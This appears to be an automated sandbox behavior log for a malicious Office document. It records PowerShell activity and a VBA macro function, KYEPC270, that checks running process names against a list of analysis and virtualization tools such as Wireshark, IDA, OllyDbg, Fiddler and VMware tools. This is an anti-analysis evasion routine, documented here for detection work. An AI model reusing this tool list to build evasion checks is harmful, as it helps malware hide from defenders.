Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","wireshark") | Name: KYEPC270 |
